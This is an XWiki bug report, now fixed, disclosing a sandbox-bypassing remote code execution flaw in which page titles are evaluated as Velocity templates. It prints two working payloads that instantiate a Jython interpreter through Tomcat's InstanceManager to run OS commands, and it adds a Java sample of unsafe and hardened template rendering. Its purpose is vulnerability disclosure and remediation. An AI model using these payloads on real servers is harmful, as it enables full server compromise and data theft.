Details
- Bug
- Resolution: Fixed
- Major
- 17.0.0-rc-1
- Unit
- Easy
- N/A
- N/A
Description
A Remote Code Execution (RCE) vulnerability exists because the page title supplied when an authenticated user with script permissions creates a page is handled improperly: the title is processed by the Apache Velocity template engine.
The application injects the page title value directly into a Velocity template. As a result, an attacker can inject arbitrary Velocity expressions or malicious template syntax that is evaluated on the server side and bypasses the Velocity sandbox.
By crafting a specially designed payload, the attacker can execute arbitrary commands on the underlying operating system with the privileges of the web application. This can lead to full compromise of the affected server, data exfiltration, or lateral movement within the network.
Payloads:
For any user with script permission:
$request.request.getServletContext().getAttribute("org.apache.tomcat.InstanceManager").newInstance("org.apache.batik.script.jpython.JPythonInterpreter").evaluate("import os; os.system('touch /tmp/RCE')")
For Admin:
$request.getServletContext().getAttribute("org.apache.tomcat.InstanceManager").newInstance("org.apache.batik.script.jpython.JPythonInterpreter").evaluate("import os; os.system('touch /tmp/RCE')")
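The root cause described above is that user data becomes part of the Velocity template source rather than a value rendered by it. The following added illustration (not XWiki code; class and method names are hypothetical, and it assumes Apache Velocity is on the classpath) shows the vulnerable concatenation pattern beside the hardened form, in which the title is passed through the context and is therefore never parsed as Velocity:

```java
import java.io.StringWriter;
import org.apache.velocity.VelocityContext;
import org.apache.velocity.app.VelocityEngine;

// Added illustration, not XWiki code. Velocity only parses directives and
// references in the template SOURCE; values supplied through the context are
// emitted verbatim, which is the property the hardened variant relies on.
public class TitleRendering {
    private static final VelocityEngine ENGINE = new VelocityEngine();
    static { ENGINE.init(); }

    // Vulnerable pattern: the user-controlled title is concatenated into the
    // template source, so any Velocity syntax it contains ($..., #...) is
    // evaluated on the server with the rights of the rendering code.
    static String renderUnsafe(String pageTitle) {
        String templateSource = "<h1>" + pageTitle + "</h1>";
        StringWriter out = new StringWriter();
        ENGINE.evaluate(new VelocityContext(), out, "title", templateSource);
        return out.toString();
    }

    // Hardened pattern: the template source is a constant string; the title
    // travels as data in the context and is printed as-is, never parsed.
    static String renderSafe(String pageTitle) {
        VelocityContext ctx = new VelocityContext();
        ctx.put("title", pageTitle);
        StringWriter out = new StringWriter();
        ENGINE.evaluate(ctx, out, "title", "<h1>$title</h1>");
        return out.toString();
    }

    public static void main(String[] args) {
        // Constructed, harmless title that contains Velocity syntax: the unsafe
        // renderer evaluates the #set directive, the safe one prints it literally.
        String title = "Release notes #set($n = 1 + 1)$n";
        System.out.println(renderUnsafe(title));
        System.out.println(renderSafe(title));
    }
}
```

Passing the value through the context stops template evaluation; HTML-escaping the title on output is a separate concern (XSS) that this snippet does not address.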
Attachments
Issue Links
- is caused by: XCOMMONS-2963 Upgrade to Servlet 5.0 (Closed)
- is duplicated by: XWIKI-23702 Remote Code Execution via Velocity scripts (Macro) (Closed)
- links to